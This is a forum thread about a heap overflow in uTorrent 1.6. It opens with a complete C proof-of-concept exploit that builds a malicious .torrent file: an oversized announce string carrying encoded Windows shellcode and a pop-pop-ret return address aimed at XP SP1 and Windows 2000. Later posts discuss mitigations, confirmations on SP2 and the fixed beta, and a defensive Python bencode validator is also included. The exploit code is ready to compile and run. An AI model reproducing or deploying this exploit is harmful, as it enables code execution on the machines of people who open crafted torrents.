FLX

Utorrent 1.6 Remote Announce Heap Overflow Exploit POC

/*
 * This is a PoC remote exploit for uTorrent 1.6
 *
 * Author:
 * defsec <defacedsecurity@hotmail.com>
 * http://www.defacedsecurity.com
 *
 *
 * Works on XP SP1 and w2k sp1-4
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strstr, strcpy, memcpy */

#define NASIZE 4880

unsigned char nice_announce[NASIZE];
unsigned char xorops[]="\x33\xc0\x33\xdb";

// win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum
// Restricted Character 0x00
unsigned char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x41\x4b\x48"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x36\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x47\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x46\x42\x30\x5a";

//msvcrt.dll pop,pop,ret addr all xp sp1 exchange it with 0x7801D07B for win2k sp3/sp4
unsigned char jmptosc[] = "\xeb\x04\
\xa7\x2c\xc2\x77\
\x33\xc0\xb0\x11\xc1\xe0\x08\x5b\x5b\x5b\x2b\xd8\xff\xe3";

int main(int argc,char *argv[])
{
    FILE * pFile;
    long lSize;
    char * buffer;
    size_t result;

    long i = 0;
    long j = 0;
    long lPtrIndex;
    long lHeadSize;
    long lTailSize;
    char * curptr;
    char * alptr;
    char * torrentTail;

    if (argc < 2)
    {
        printf("\n[uTorrent 1.6] Heap Overflow Exploit - by [DEFACEDSECURITY]");
        printf("\n\nUsage: ");
        printf("%s",argv[0]);
        printf(" <TorrentFile>\n");
        return 0;
    }

    pFile = fopen (argv[1],"rb");
    if (pFile==NULL)
    {
        fputs ("File error",stderr);
        return 0;
    }

    // obtain file size:
    fseek (pFile ,0,SEEK_END);
    lSize = ftell (pFile);
    rewind (pFile);

    // allocate memory to contain the whole file, plus a NUL so strstr() stops at the end:
    buffer = (char*) malloc (sizeof(char)*(lSize+1));
    if (buffer == NULL)
    {
        fputs ("Memory error",stderr);
        return 0;
    }

    // copy the file into the buffer:
    result = fread (buffer,1,lSize,pFile);
    if (result != (size_t)lSize)
    {
        fputs ("Reading error",stderr);
        return 0;
    }
    buffer[lSize] = '\0';

    fclose (pFile);

    /* find announce / announce-list and erase it */
    alptr = (char *) strstr(buffer,"announce");
    if (alptr == NULL)
    {
        printf("\ninvalid torrent file");
        return 0;
    }

    /* everything from the "comment" key onward is kept as the tail */
    curptr = (char *) strstr(alptr, "7:comment");
    if (curptr == NULL)
    {
        printf("\ninvalid torrent file: no comment field after announce");
        return 0;
    }
    lHeadSize = curptr - buffer;
    lTailSize = lSize - lHeadSize;

    torrentTail = (char *) malloc (sizeof(char)*lTailSize);
    memcpy(torrentTail,curptr,lTailSize);

    /* generate offending header: a 4864-byte "announce" string filled with 0x90 */
    strcpy((char *)nice_announce,"d8:announce4864:");
    for (lPtrIndex = 16; lPtrIndex < 4864+16; lPtrIndex++)   /* '<' keeps the write inside NASIZE */
        nice_announce[lPtrIndex] = 0x90;
    lPtrIndex = 84;
    memcpy(nice_announce + lPtrIndex ,xorops,sizeof(xorops)-1);
    lPtrIndex += sizeof(xorops) -1;
    memcpy(nice_announce+lPtrIndex,shellcode, sizeof(shellcode)-1);
    for (lPtrIndex = 4438; lPtrIndex<4458; lPtrIndex++,i++)
        nice_announce[lPtrIndex] = jmptosc[i];

    /* get head and tail together into a file */
    curptr = (char *) malloc(sizeof(char)*(NASIZE+lTailSize));
    for (i=0;i<NASIZE;i++)
        curptr[i] = nice_announce[i];
    for (;i<(NASIZE+lTailSize);i++,j++)
        curptr[i] = torrentTail[j];

    /* write to file and exit */
    pFile = fopen ( "output.torrent" , "wb" );
    if (pFile==NULL)
    {
        fputs ("File error",stderr);
        return 0;
    }
    fwrite(curptr, sizeof(char), (NASIZE+lTailSize), pFile);
    fclose (pFile);

    return 1337; //:)
}

Just a heads up.


Yah, previously reported on the IRC channel ;\

Just for clarification, it's an exploit that makes use of specifically-engineered .torrent files with corrupt dictionaries, and is not a remote security issue. What does it mean for users? Until a fix is implemented, be careful where you get your .torrent files from -- that's all. Do realize that if you're not sure you can trust all of your RSS feeds, disable them for the time being (so as to prevent µTorrent from autoloading malicious .torrent files).

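The PoC above rests on a single oversized "announce" string (the header it writes is "d8:announce4864:" followed by 4864 bytes), and the clarification above frames the risk as loading an untrusted .torrent. A loader-side check that catches that shape is a strict bencode decoder that refuses declared string lengths running past the file and rejects an announce that is not a short, printable tracker URL. This is an added example, not code from the thread or from µTorrent; MAX_ANNOUNCE_LEN and the two sample torrents are constructed.

```python
import re
MAX_ANNOUNCE_LEN = 512   # assumption: generous ceiling for a real tracker URL

def bdecode(data, pos=0):
    """Strict bencode decoder returning (value, next_pos); over-long strings are errors."""
    c = data[pos:pos + 1]
    if c == b"i":                                   # integer: i<digits>e
        end = data.index(b"e", pos)
        return int(data[pos + 1:end]), end + 1
    if c in (b"l", b"d"):                           # list / dictionary
        items, pos = [], pos + 1
        while data[pos:pos + 1] != b"e":            # hitting EOF raises "bad token" below
            value, pos = bdecode(data, pos)
            items.append(value)
        if c == b"l":
            return items, pos + 1
        if len(items) % 2:
            raise ValueError("dictionary with an odd number of items")
        return dict(zip(items[0::2], items[1::2])), pos + 1
    if c.isdigit():                                 # string: <len>:<bytes>
        colon = data.index(b":", pos)
        n, start = int(data[pos:colon]), colon + 1
        if start + n > len(data):
            raise ValueError(f"string length {n} exceeds the {len(data) - start} bytes left")
        return data[start:start + n], start + n
    raise ValueError(f"bad token at offset {pos}")

def check_torrent(data):
    """Return (ok, reason). Flags the oversized, non-URL announce the PoC relies on."""
    try:
        meta, _ = bdecode(data)
    except (ValueError, TypeError, IndexError) as exc:
        return False, f"malformed bencode: {exc}"
    if not isinstance(meta, dict):
        return False, "top level is not a dictionary"
    urls = [meta[b"announce"]] if b"announce" in meta else []
    for tier in meta.get(b"announce-list", []):
        urls.extend(tier if isinstance(tier, list) else [tier])
    for url in urls:
        url = url if isinstance(url, bytes) else b""   # non-strings fail the URL test
        if len(url) > MAX_ANNOUNCE_LEN:
            return False, f"announce is {len(url)} bytes (limit {MAX_ANNOUNCE_LEN})"
        if not re.fullmatch(rb"(https?|udp)://[\x21-\x7e]+", url):
            return False, "announce is not a printable tracker URL"
    return True, "ok"

# Constructed samples: a minimal benign torrent, and the PoC's header layout (4864 filler bytes).
GOOD = b"d8:announce26:http://tracker.example/ann4:infod6:lengthi1e4:name1:a12:piece lengthi1e6:pieces0:ee"
EVIL = b"d8:announce4864:" + b"\x90" * 4864 + b"e"
```

A truncated copy of the crafted file fails earlier, in the decoder, because the declared 4864-byte length no longer fits in the buffer.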

"Koepi" (who first informed us on the channel) tested it on SP2, and supposedly, it did work. ^^inf^^ also confirmed it to be working. Not sure about arbitrary code execution though.


I already saw an arbitrary code execution and a local privilege escalation PoC where I'm from. But this is the only one that has been made public. Said to be working on win2000, xp sp1 and xp sp2.


It begs the question, why has the beta version not been added to the download page yet? It's been the most recent, and fully stable, version for at least the past what, 3 months?

edit: Added to the download page as a beta, that is, since obviously it is a "beta"... betas USED to be added to the download page!


I understand that. <_<

This. There used to be a beta download there. It's a bitch to scour the forums for that one topic with the download link in it when I want to grab the beta... v.v


Oh my post wasn't actually a response so much as it was an update :P I'm not sure why it's not on the front page yet, but I guess they're waiting to update the automatic update server. Or something.


Dunno, I kinda prefer that betas are linked to from the forum anyway -- it kinda encourages people to visit the forum and report bugs should any pop up.


I wouldn't have even known there was a beta if I hadn't already been active in the forums... I think of the forums as the place to, as you said, report bugs... but the main site as the place to get official betas and releases... =\

Perhaps if they would link people - from the download page - to the forum topic about the beta... that would work well too. *shrug*

Hey, if the new 1.6.1 is coming out soon, all the better! I think it may have fixed my UPnP problem too, I dunno =)


What piece of the story are we missing that "months" went by before the version of the program that the vast majority of the people know about and use (as opposed to a silent beta that was supposed to be only for the webui interface) was actually updated?

Was the exploit not public until this week? Was it maybe unconfirmed until this week that SP2 was vulnerable, thereby reducing the urgency to release the fix?


beta 483 wasn't vulnerable to the issue and it was released last year. Ludde actually unintentionally fixed it when some stuff was rewritten, so it just wasn't known that there was an exploit in the first place.
